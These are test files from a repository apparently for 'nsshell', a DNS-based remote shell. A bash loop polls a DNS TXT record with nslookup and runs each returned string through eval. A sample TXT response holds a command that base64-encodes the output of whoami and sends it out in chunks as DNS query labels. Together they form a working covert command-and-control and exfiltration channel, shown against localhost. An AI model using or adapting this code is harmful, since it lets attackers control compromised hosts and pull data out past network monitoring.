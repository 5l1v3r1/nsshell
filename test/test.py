for x in range(0,100):
	print("echo "+str(x)+" >> /tmp/test")

