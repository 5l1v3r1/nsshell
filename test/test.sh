while [ "$m" != "e" ];do nslookup -type=txt YG. localhost|grep -o '"[^"]\+"'|while read m;do if [ "$m" != "$n" ] && [ ${#m} -gt 1 ];then n=$m;eval $m;fi;done;done