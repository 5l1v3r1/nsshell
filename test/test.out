Server:		localhost
Address:	127.0.0.1#53

Non-authoritative answer:
x1	text = "(whoami|base64|while read r\;do i=0\;k=0\;while [ $i -lt ${#r} ]\;do j=0\;p=\"x1$k.\"\;k=$[k+1]\;while [ $i -lt ${#r} ] && [ $j -lt 3 ]\;do p=\"$p${r:$i:61}.\"\;i=$[i+61]\;j=$[j+1]\;done\;`nslookup ${p} localhost`\;done\;done\;)"

Authoritative answers can be found from:

